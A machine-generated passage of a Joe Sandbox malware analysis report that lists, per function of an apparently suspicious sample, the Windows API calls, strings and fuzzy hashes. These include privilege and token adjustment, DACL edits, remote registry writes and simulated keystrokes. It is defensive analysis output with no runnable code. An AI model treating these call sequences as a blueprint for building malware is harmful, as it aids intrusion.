                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C7CE60
                                                  • SetCapture.USER32(?), ref: 00C7CE69
                                                  • ClientToScreen.USER32(?,?), ref: 00C7CECE
                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C7CEDB
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C7CEF5
                                                  • ReleaseCapture.USER32 ref: 00C7CF00
                                                  • GetCursorPos.USER32(?), ref: 00C7CF3A
                                                  • ScreenToClient.USER32(?,?), ref: 00C7CF47
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C7CFA3
                                                  • SendMessageW.USER32 ref: 00C7CFD1
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C7D00E
                                                  • SendMessageW.USER32 ref: 00C7D03D
                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C7D05E
                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C7D06D
                                                  • GetCursorPos.USER32(?), ref: 00C7D08D
                                                  • ScreenToClient.USER32(?,?), ref: 00C7D09A
                                                  • GetParent.USER32(?), ref: 00C7D0BA
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C7D123
                                                  • SendMessageW.USER32 ref: 00C7D154
                                                  • ClientToScreen.USER32(?,?), ref: 00C7D1B2
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C7D1E2
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C7D20C
                                                  • SendMessageW.USER32 ref: 00C7D22F
                                                  • ClientToScreen.USER32(?,?), ref: 00C7D281
                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C7D2B5
                                                    • Part of subcall function 00BF25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BF25EC
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C7D351
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                  • String ID: @GUI_DRAGID$F
                                                  • API String ID: 3977979337-4164748364
                                                  • Opcode ID: b05e9ecb65bb35193086fd5d23c08234b5615b577192d5c8f0f19ae3a1e59dde
                                                  • Instruction ID: a8823ade40cd9207396e5364e6fecf6f83d7853c645d7d292c94a5c9b644cfe5
                                                  • Opcode Fuzzy Hash: b05e9ecb65bb35193086fd5d23c08234b5615b577192d5c8f0f19ae3a1e59dde
                                                  • Instruction Fuzzy Hash: 5042CC74204242AFDB21CF69C884BAABBF5FF48310F14861DF6A9972B1C731D985DB52
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove$_memset
                                                  • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                  • API String ID: 1357608183-1798697756
                                                  • Opcode ID: 37953a6a740402af9561937f6bff1e5ed95988cb909c37c0570fee41d809a136
                                                  • Instruction ID: 29ba9255c509dfd3aa91eeac4b8a861ff0c737819a3e7a3e8520c4fc6d730a6a
                                                  • Opcode Fuzzy Hash: 37953a6a740402af9561937f6bff1e5ed95988cb909c37c0570fee41d809a136
                                                  • Instruction Fuzzy Hash: F593A271E04219DFDB28CF98C881BADB7B1FF48310F25816AE955EB291E7709E81DB50
                                                  APIs
                                                  • GetForegroundWindow.USER32(00000000,?), ref: 00BF48DF
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C2D665
                                                  • IsIconic.USER32(?), ref: 00C2D66E
                                                  • ShowWindow.USER32(?,00000009), ref: 00C2D67B
                                                  • SetForegroundWindow.USER32(?), ref: 00C2D685
                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C2D69B
                                                  • GetCurrentThreadId.KERNEL32 ref: 00C2D6A2
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C2D6AE
                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C2D6BF
                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C2D6C7
                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 00C2D6CF
                                                  • SetForegroundWindow.USER32(?), ref: 00C2D6D2
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C2D6E7
                                                  • keybd_event.USER32(00000012,00000000), ref: 00C2D6F2
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C2D6FC
                                                  • keybd_event.USER32(00000012,00000000), ref: 00C2D701
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C2D70A
                                                  • keybd_event.USER32(00000012,00000000), ref: 00C2D70F
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C2D719
                                                  • keybd_event.USER32(00000012,00000000), ref: 00C2D71E
                                                  • SetForegroundWindow.USER32(?), ref: 00C2D721
                                                  • AttachThreadInput.USER32(?,?,00000000), ref: 00C2D748
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 4125248594-2988720461
                                                  • Opcode ID: 197a57f91a57b082f9263eda519530af1073d2ea3af745231a997f2b1a615b9a
                                                  • Instruction ID: a3fcfe506de6b75b7d834ce52bfb02f302e4087d77b36da9efb98d96db9e0dc1
                                                  • Opcode Fuzzy Hash: 197a57f91a57b082f9263eda519530af1073d2ea3af745231a997f2b1a615b9a
                                                  • Instruction Fuzzy Hash: 10318C71A40318BBEB206F619CC9F7F7F6CEB54B50F104029FA05EA1D1C6B05D41ABA1
                                                  APIs
                                                    • Part of subcall function 00C487E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C4882B
                                                    • Part of subcall function 00C487E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C48858
                                                    • Part of subcall function 00C487E1: GetLastError.KERNEL32 ref: 00C48865
                                                  • _memset.LIBCMT ref: 00C48353
                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00C483A5
                                                  • CloseHandle.KERNEL32(?), ref: 00C483B6
                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C483CD
                                                  • GetProcessWindowStation.USER32 ref: 00C483E6
                                                  • SetProcessWindowStation.USER32(00000000), ref: 00C483F0
                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C4840A
                                                    • Part of subcall function 00C481CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C48309), ref: 00C481E0
                                                    • Part of subcall function 00C481CB: CloseHandle.KERNEL32(?,?,00C48309), ref: 00C481F2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                  • String ID: $default$winsta0
                                                  • API String ID: 2063423040-1027155976
                                                  • Opcode ID: 6943fd4d42edd05d74c98ec8aeaa1c18a5416328be8446b2c75ff9f7c3b23ab1
                                                  • Instruction ID: 2a03d4d6ca57db8c8e14ec4418420459b48039855cf647a04ee64d147f0fad21
                                                  • Opcode Fuzzy Hash: 6943fd4d42edd05d74c98ec8aeaa1c18a5416328be8446b2c75ff9f7c3b23ab1
                                                  • Instruction Fuzzy Hash: CB815C71900209AFEF11EFA4DC85BEE7BB9FF04704F144169F924A6261DB358E59EB20
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C5C78D
                                                  • FindClose.KERNEL32(00000000), ref: 00C5C7E1
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C5C806
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C5C81D
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C5C844
                                                  • __swprintf.LIBCMT ref: 00C5C890
                                                  • __swprintf.LIBCMT ref: 00C5C8D3
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                  • __swprintf.LIBCMT ref: 00C5C927
                                                    • Part of subcall function 00C13698: __woutput_l.LIBCMT ref: 00C136F1
                                                  • __swprintf.LIBCMT ref: 00C5C975
                                                    • Part of subcall function 00C13698: __flsbuf.LIBCMT ref: 00C13713
                                                    • Part of subcall function 00C13698: __flsbuf.LIBCMT ref: 00C1372B
                                                  • __swprintf.LIBCMT ref: 00C5C9C4
                                                  • __swprintf.LIBCMT ref: 00C5CA13
                                                  • __swprintf.LIBCMT ref: 00C5CA62
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                  • API String ID: 3953360268-2428617273
                                                  • Opcode ID: ba36ff178ab821e6d2d745c5e285d959ba0572101db57351f20d8f4b2600065d
                                                  • Instruction ID: cd85d750cc6d96565563990eb1906021d3f9ce5bce5f657a2013ebd7320b15ea
                                                  • Opcode Fuzzy Hash: ba36ff178ab821e6d2d745c5e285d959ba0572101db57351f20d8f4b2600065d
                                                  • Instruction Fuzzy Hash: 17A12AB1408348AFC714EFA4C885EBFB7ECBF95704F404969F69587191EA34DA48CB62
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00C5EFB6
                                                  • _wcscmp.LIBCMT ref: 00C5EFCB
                                                  • _wcscmp.LIBCMT ref: 00C5EFE2
                                                  • GetFileAttributesW.KERNEL32(?), ref: 00C5EFF4
                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00C5F00E
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00C5F026
                                                  • FindClose.KERNEL32(00000000), ref: 00C5F031
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00C5F04D
                                                  • _wcscmp.LIBCMT ref: 00C5F074
                                                  • _wcscmp.LIBCMT ref: 00C5F08B
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C5F09D
                                                  • SetCurrentDirectoryW.KERNEL32(00CA8920), ref: 00C5F0BB
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C5F0C5
                                                  • FindClose.KERNEL32(00000000), ref: 00C5F0D2
                                                  • FindClose.KERNEL32(00000000), ref: 00C5F0E4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                  • String ID: *.*
                                                  • API String ID: 1803514871-438819550
                                                  • Opcode ID: 38e6b3fbcc40fc99341bc1ac00d343bf5ae6e1e824d691039169d05d8dfcd587
                                                  • Instruction ID: 07e73842d289490c681331b3f7273c7a966a5b345a1506901497da65befcc5b8
                                                  • Opcode Fuzzy Hash: 38e6b3fbcc40fc99341bc1ac00d343bf5ae6e1e824d691039169d05d8dfcd587
                                                  • Instruction Fuzzy Hash: AF31D4365002196BCB189BB4DC88BEE77AC9F85361F144179E818D20E1EB70DBCADB65
                                                  APIs
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C70953
                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00C7F910,00000000,?,00000000,?,?), ref: 00C709C1
                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00C70A09
                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00C70A92
                                                  • RegCloseKey.ADVAPI32(?), ref: 00C70DB2
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00C70DBF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Close$ConnectCreateRegistryValue
                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                  • API String ID: 536824911-966354055
                                                  • Opcode ID: d5e8e7b920b7937cf77576e75815ec37060d100d0985af5cac5c31109f8d5238
                                                  • Instruction ID: 923eb57269d7804cef49d8635ef5df23af1354e1f712b8b3b016eb431adbcc33
                                                  • Opcode Fuzzy Hash: d5e8e7b920b7937cf77576e75815ec37060d100d0985af5cac5c31109f8d5238
                                                  • Instruction Fuzzy Hash: 340259756006019FCB14EF24C881E2AB7E5FF89754F14899CF99A9B3A2DB30ED45CB81
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00C5F113
                                                  • _wcscmp.LIBCMT ref: 00C5F128
                                                  • _wcscmp.LIBCMT ref: 00C5F13F
                                                    • Part of subcall function 00C54385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C543A0
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00C5F16E
                                                  • FindClose.KERNEL32(00000000), ref: 00C5F179
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00C5F195
                                                  • _wcscmp.LIBCMT ref: 00C5F1BC
                                                  • _wcscmp.LIBCMT ref: 00C5F1D3
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C5F1E5
                                                  • SetCurrentDirectoryW.KERNEL32(00CA8920), ref: 00C5F203
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C5F20D
                                                  • FindClose.KERNEL32(00000000), ref: 00C5F21A
                                                  • FindClose.KERNEL32(00000000), ref: 00C5F22C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                  • String ID: *.*
                                                  • API String ID: 1824444939-438819550
                                                  • Opcode ID: 6db4b231dd730006816f0281469c7fc0f2df5aa5e63c5a368072c73503b44666
                                                  • Instruction ID: 03c94fdf450f040531350467d9c8b8f8850db661fe70c650ecab45e6d07ba4d4
                                                  • Opcode Fuzzy Hash: 6db4b231dd730006816f0281469c7fc0f2df5aa5e63c5a368072c73503b44666
                                                  • Instruction Fuzzy Hash: E731C67A5001196ADB189A64EC85FEE77AC9F45365F100179EC14A20A0EB30DBCADA58
                                                  APIs
                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C5A20F
                                                  • __swprintf.LIBCMT ref: 00C5A231
                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C5A26E
                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C5A293
                                                  • _memset.LIBCMT ref: 00C5A2B2
                                                  • _wcsncpy.LIBCMT ref: 00C5A2EE
                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C5A323
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C5A32E
                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00C5A337
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C5A341
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                  • String ID: :$\$\??\%s
                                                  • API String ID: 2733774712-3457252023
                                                  • Opcode ID: cf01fcfb5e386a8ef3d8c3b3372ab8cecd47dd7028f96caca24a23732a707eea
                                                  • Instruction ID: 26899f9b275fc1d4133385572b8e4d35589b5425add77ae88de32b554e461d13
                                                  • Opcode Fuzzy Hash: cf01fcfb5e386a8ef3d8c3b3372ab8cecd47dd7028f96caca24a23732a707eea
                                                  • Instruction Fuzzy Hash: D731A075904109ABDB219FA1DC89FEF37BCAF89705F1041BAF908D2161EB7097858B25
                                                  APIs
                                                    • Part of subcall function 00C48202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C4821E
                                                    • Part of subcall function 00C48202: GetLastError.KERNEL32(?,00C47CE2,?,?,?), ref: 00C48228
                                                    • Part of subcall function 00C48202: GetProcessHeap.KERNEL32(00000008,?,?,00C47CE2,?,?,?), ref: 00C48237
                                                    • Part of subcall function 00C48202: HeapAlloc.KERNEL32(00000000,?,00C47CE2,?,?,?), ref: 00C4823E
                                                    • Part of subcall function 00C48202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C48255
                                                    • Part of subcall function 00C4829F: GetProcessHeap.KERNEL32(00000008,00C47CF8,00000000,00000000,?,00C47CF8,?), ref: 00C482AB
                                                    • Part of subcall function 00C4829F: HeapAlloc.KERNEL32(00000000,?,00C47CF8,?), ref: 00C482B2
                                                    • Part of subcall function 00C4829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C47CF8,?), ref: 00C482C3
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C47D13
                                                  • _memset.LIBCMT ref: 00C47D28
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C47D47
                                                  • GetLengthSid.ADVAPI32(?), ref: 00C47D58
                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00C47D95
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C47DB1
                                                  • GetLengthSid.ADVAPI32(?), ref: 00C47DCE
                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C47DDD
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00C47DE4
                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C47E05
                                                  • CopySid.ADVAPI32(00000000), ref: 00C47E0C
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C47E3D
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C47E63
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C47E77
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                  • String ID:
                                                  • API String ID: 3996160137-0
                                                  • Opcode ID: 72a7b35f87566237830a7d0d5e66b4d587f52641cef15c3323a7ce7d71376919
                                                  • Instruction ID: b79fd0af427047799e70fd6ebc4101587bda97adf0e657208c2bc50ed0dfbcd9
                                                  • Opcode Fuzzy Hash: 72a7b35f87566237830a7d0d5e66b4d587f52641cef15c3323a7ce7d71376919
                                                  • Instruction Fuzzy Hash: 46613871904209AFDF10DFA4DC85EEEBBB9FF04300F048269F925A7291DB719A46DB60
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                  • API String ID: 0-4052911093
                                                  • Opcode ID: 49322fb40f1bd1545a19e3ac4cc5b58677ea4e66de529e791605d25d4aea5411
                                                  • Instruction ID: d6408a33ad60ab54ba211164d2f9c51f0eebb762fde7ad09cbd6abe2adfb1735
                                                  • Opcode Fuzzy Hash: 49322fb40f1bd1545a19e3ac4cc5b58677ea4e66de529e791605d25d4aea5411
                                                  • Instruction Fuzzy Hash: D57260B5E00219DBDF24CF59C8807AEB7B5FF44710F14816AE859EB291EB709E81DB90
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 00C50097
                                                  • SetKeyboardState.USER32(?), ref: 00C50102
                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00C50122
                                                  • GetKeyState.USER32(000000A0), ref: 00C50139
                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00C50168
                                                  • GetKeyState.USER32(000000A1), ref: 00C50179
                                                  • GetAsyncKeyState.USER32(00000011), ref: 00C501A5
                                                  • GetKeyState.USER32(00000011), ref: 00C501B3
                                                  • GetAsyncKeyState.USER32(00000012), ref: 00C501DC
                                                  • GetKeyState.USER32(00000012), ref: 00C501EA
                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00C50213
                                                  • GetKeyState.USER32(0000005B), ref: 00C50221
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: State$Async$Keyboard
